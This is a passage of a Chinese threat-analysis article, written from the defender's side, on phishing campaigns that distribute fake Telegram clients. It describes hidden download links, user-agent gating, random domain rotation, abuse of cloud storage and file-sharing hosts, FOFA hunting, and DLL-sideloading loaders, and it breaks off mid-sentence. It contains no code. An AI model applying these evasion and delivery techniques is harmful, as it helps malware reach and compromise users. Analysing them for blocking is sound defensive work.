black;">受害者选择完客户端后，流程就到了下载部分。攻击者在这部分的工作主要是bypass或者保证存活、方便分发之类的工作，此处简单阐述几种情况。</p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 16px;"><span style="display: none;"></span>直接超链接<span style="display: none;"></span></h5><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1"><li><p><br/></p><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">最常见的情况就是下载按钮直接对应超链接，这种方式用户在正常的浏览形态下，把鼠标放到按钮上即可看到下载链接，只是基础的下载功能，不具备什么隐蔽性。</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"></figcaption><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.549074074074074" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9f1b1f52&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzDcs2aMeRqX3P1Lxuqs7z5Ef5yP6XIPGZBQkpVvNac5ibNrsar2qNygQ%2F640%3Fwx_fmt%3Dpng"/></figure></section><p><br/></p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">像这种跟上图中的也区别不大</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><br/></p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><br/></p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><img class="rich_pages wxw-img" data-ratio="0.4935185185185185" data-w="1080" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=54ce332c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzdh985uraUGNiaXQ162Z0xwR0dWcly49Iu3puptibVrtT7yZoGpsCnklQ%2F640%3Fwx_fmt%3Dpng"/><br/></p></li></ol><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 16px;"><span style="display: none;"></span>隐蔽超链接<span style="display: none;"></span></h5><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">还有一种情况是鼠标放上去看不见下载地址，大概分为两种设置：下载链接也在前端只不过对应的是js的事件、用户点击后后端再返回下载地址。</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"></figcaption><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5138888888888888" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=0e2ca70f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzYuDe5Y7XrV7HD7wbiaFbibF0ib7FdarJKFzqRNY4a2puNCicibqwTv6pSHg%2F640%3Fwx_fmt%3Dpng"/></figure></section></li></ol><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 16px;"><span style="display: none;"></span>特殊下载域名<span style="display: none;"></span></h5><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">下载功能使用了特制的下载域名，封禁角度来说就多了一个封禁的点。</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.425" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e6e8969b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzUunWWHw6hiciaIsCo5hOuTicGl2fX56rNWJkrmkhyOw8hYJ75TMhcTc1Q%2F640%3Fwx_fmt%3Dpng"/></figure></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5935185185185186" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9c3f90a0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzdETwMgL7LFoKZgJbpevRReKhXDU0rZN2iaI1XCDicib5QrXBEbEnkT15Q%2F640%3Fwx_fmt%3Dpng"/></p></li></ol><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 16px;"><span style="display: none;"></span>特殊下载页面<span style="display: none;"></span></h5><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">经常可以看到一款自定义的下载页面，会在返回给用户下载地址后关闭，猜测可能是攻击者分发文件或者bypass chrome下载功能的手段。</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5027777777777778" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b52d6f85&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz06sVZ9eE9mict5tyF5aY3QMFb7uKbRYsWibTNZukoXLp5vxcibh7PoHAA%2F640%3Fwx_fmt%3Dpng"/></figure></section></li></ol><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 16px;"><span style="display: none;"></span>条件检查<span style="display: none;"></span></h5><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">假冒官网首页反调试</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c9f7d02d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzG53OmOAlO9F6TX32VaNqx1udM8wBjiam2nPbN1zANX0QiauW5UWrsIAQ%2F640%3Fwx_fmt%3Dpng"/></figure></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">跳转专用的下载域名</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.8481481481481481" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c642b97b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzCpYjNRia17icajMJZXafWSpicl9GnaLSPXTWicibAlrqWBvGHb0vQfLXhzA%2F640%3Fwx_fmt%3Dpng"/></figure></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">直接访问下载地址返回404</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.15952890792291222" data-s="300,640" style="" data-type="png" data-w="934" src="https://wechat2rss.xlab.app/img-proxy/?k=42540044&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzeaichmdsiaTJQAUkyShRA6SkD60ODbJX7ATdutHaq2BInbxuicERPzr9A%2F640%3Fwx_fmt%3Dpng"/></figure></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">分析后发现Windows的UA无法得到真实的下载地址</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3416666666666667" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a1a08318&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzLaibtGSTMf5zFFRJmmeS3hic7icNHIGbKERAEicYNGCaicQWx8fd4h0tEDQ%2F640%3Fwx_fmt%3Dpng"/></figure></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">UA为安卓客户端时才会返回正确跳转地址，攻击者采用这种方式来保护自身下载地址。</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.32407407407407407" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=41137432&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz8TxZ1VBBONibvDHMHbccaruGkcfbsDY60YI94BtgXlRica5WHcy4TxEw%2F640%3Fwx_fmt%3Dpng"/></figure></section></li></ol><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>域名随机分发<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">实际在真正到达攻击者自己搭建的假冒telegram官网之前，用户点击中转页面的跳转链接后，也存在bypass的细节。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">曾经在分析过程中发现点击假冒官网链接后， 前后两次得到的官网地址不唯一，后来发现攻击者采用了一种随机分发域名的思路，以此来保证存活率。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5231481481481481" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=30d37d45&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzKZFv20TshW9ab3pehfcTRX7GPMVF1T8VuDz7KfFPJSCK7qXFDNFcdw%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>文件托管<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">文件托管部分理论上应该是在自建假冒官网部分中的，但是由于有时Youtune这些中转页面下部的超链接对应的就是文件托管地址，没有假冒官网这层中转步骤。以及文件托管部分也具备一定的bypass功能，所以单独在这里介绍。</p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>OSS下载链接<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">从下载链接的维度来说的话，除攻击者自己申请的下载域名外，最常见的就是使用阿里云OSS来托管恶意客户端。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4740740740740741" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=da661405&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzbzYPE8icqfkOuxrTB5T88vkIialN7AeqoKcq4XqCIictt16YQ5dCIV8Kw%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/><mpchecktext><br/></mpchecktext></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5416666666666666" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9d5d745d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzvMT0TwQvneuo7BvY3uQXXDE10EzCgh6fic0icficyU9icH7RzOyryxLp9w%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6194444444444445" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=fe46316c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzefT5XUp0bY2K0X3ubUvLmUPMxETUn0oSmP9dHApZ3N1H1KUDss2YLQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">除阿里云oss服务外，也有使用腾讯云oss、AWS oss服务的案例。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.1366822429906542" data-s="300,640" style="" data-type="png" data-w="856" src="https://wechat2rss.xlab.app/img-proxy/?k=aca270b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzicc2TbYVxlKxs0icDgUzKSQib5tUXHPofuI4cRXysuTUCsP8T11UlnoWQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.14860681114551083" data-s="300,640" style="" data-type="png" data-w="646" src="https://wechat2rss.xlab.app/img-proxy/?k=78f5cd0c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz1jRl0FjareS4umz88TbSXXiaJTArWWQcxsq9ApLzxteXZpd93TZq7mw%2F640%3Fwx_fmt%3Dpng"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>网盘等白服务<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">攻击者使用oss托管文件的方式虽然是使用了第三方的服务，但是oss域名绝大多数都是唯一的域名地址，所以仍然可以进行劫持或者阻断。但是有些案例当中，攻击者使用了网盘等白服务的下载直链作为下载地址，地址中的域名是服务方的不唯一域名，封禁的话就可能会影响正常业务。</p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 16px;"><span style="display: none;"></span>onedrive案例<span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">点击下载按钮后，返回了OneDrive的下载链接。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4305555555555556" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=19a425e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzBsoXpFOdsC0ibhZdibOic9d0oibuJupicicx57kzhzsJs6Myz4YbNaVLdaCQ%2F640%3Fwx_fmt%3Dpng"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 16px;"><span style="display: none;"></span>Filebin案例<span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">filebin是公用的文件托管服务，此处返回的下载地址是 filebin.net</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6175925925925926" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c1a7bf24&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzCVMw9Tes3DaFwl5UDdb9xxuhRWUHOX1d4RF6TOG32A7dZzzucXq1sA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3509259259259259" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c6b4638f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzJxvNN2Bcd3WcxXb83nLrUKJOy390Kgjfp27oLPjSywx8ibdVBNaasFA%2F640%3Fwx_fmt%3Dpng"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>HFS等非主流渠道<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">有时也能够看到下载地址是基于纯IP开放的web服务，这种情况多半是攻击者自己搭建的HFS服务。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5064814814814815" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8ad8b5df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzJbBomunkpNg6NHpCADyYibuZIgRVuKNktDt0pcK5kDZqdDH1l1sibfVg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.21851851851851853" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e31c6169&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzETlht28oviclf4XQblGJ2ibVbJyLNg1ScJo2Hzw7NRNvPy4ibzI65KOww%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">另外一个案例</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6101851851851852" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=5e47f7cd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzY0CtZ4lCWxlAt6UyCDAGyiccfgv2JMdbsGP3ktvh31bO9L26pQpFhGg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5037037037037037" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=58af7195&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzcnMeQStTOjVI6fH8ONwS8kDFboMYHGX3XYiaP8mMUeUsFRBDSV5GZDg%2F640%3Fwx_fmt%3Dpng"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 16px;"><span style="display: none;"></span>特征狩猎<span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">像HFS这种情况，服务的特征还是相当明显的，我们可以使用使用FOFA等互联网资产搜索引擎来过滤出被采集到的恶意服务。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">该搜索结果风格基本是单服务、单IP。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6138888888888889" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=98f46a6a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzyOm5bgcP6zvmQZzuE5ibkavYfW0r9DF7uB8CdsvB7qbybbvQKhD7Tcw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">该搜索结果风格是多域名、单IP，可见攻击者比较偷懒，注册了多个垃圾域名均解析到了单个IP开启的服务。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6083333333333333" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=f39f333d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzoIL0e2z79mNpVPwib7IfIrnwhN1uLxTje0qwMN9fibiaYJH7eeUIIY0JQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">当然了，直接根据关键字去匹，也能匹配到不少假冒官网。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6675925925925926" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=81acc8d9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTziaybiaJEzhjFLMCNffr0JIHKibdHFrzTgasImZmjJptyJlklMZnJgrUZw%2F640%3Fwx_fmt%3Dpng"/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>客户端类型</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">客户端类型相关的信息量较少，需要注意的基本只有格式、命名两点。文件格式变换可能是出于免杀、bypass chrome下载文件安全提醒考虑，安装包文件名则可能主要用来欺骗用户。本文更侧重于自动化封禁处理的角度，这里不再赘述。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6962962962962963" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=819a4774&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzz0ia96MNqAgJL9iag4fSHyOBJ8XmYtyxHx14rUGuNs2gE7lxhN2zpGGA%2F640%3Fwx_fmt%3Dpng"/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>常见C2特征</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">日常分析对C2接触不算多，此处仅介绍几个接触过的比较有代表性的场景：</p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">常见恶意客户端的使命无非两个：释放出中文版telegram给用户使用、运行木马。目前最常见的木马运行方式即为 “白加黑”，攻击者一般会选用迅雷、某些游戏客户端等的exe组件作为加载恶意dll的载体。</p></section></li><li><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">对于比较传统的MSI后缀流派，7z的分析效果比较好（要看具体场景）。以某次直接释放MFC木马的假冒telegram客户端为例：</p><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.6444444444444445" data-w="1080" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=7ecf7fa4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzQ0xDQd2SjLGVMrvnYnSnFzD0bH5DXicshPg7H9r9EQsjVS5P4xrYUmw%2F640%3Fwx_fmt%3Dpng"/>以某次使用 “白加黑” 手法的Firefox钓鱼客户端为例（很多假冒tg客户端也是同样的手法）：</figure></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6388888888888888" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=45adc5eb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzcqqOmFyxR9e7Jmm72ZVFZL59IrZAwm8lApYMI4E17a4QXesH8vJ43A%2F640%3Fwx_fmt%3Dpng"/></p></li><li><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">C2木马具有复杂性提升的发展趋势。最初比较常见的木马释放流程就是安装包释放出loader，loader运行加密的shellcode，但近期分析的木马却更加复杂一些。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><br/></p><p><br/></p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">下图案例中的exe安装包将释放出msi安装包、压缩文件包、PE文件，msi安装包释放出downloader（downloader疑似也是一个被恶意利用的组件）。</p><p><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5287037037037037" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=51115690&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz7zoX8Clic7jTTGr8gJL5El3raz8gHv5o79xez6icrLOLfniaW9b8s44jQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">downloader在有道云笔记相关的分享链接下载加密的压缩文件 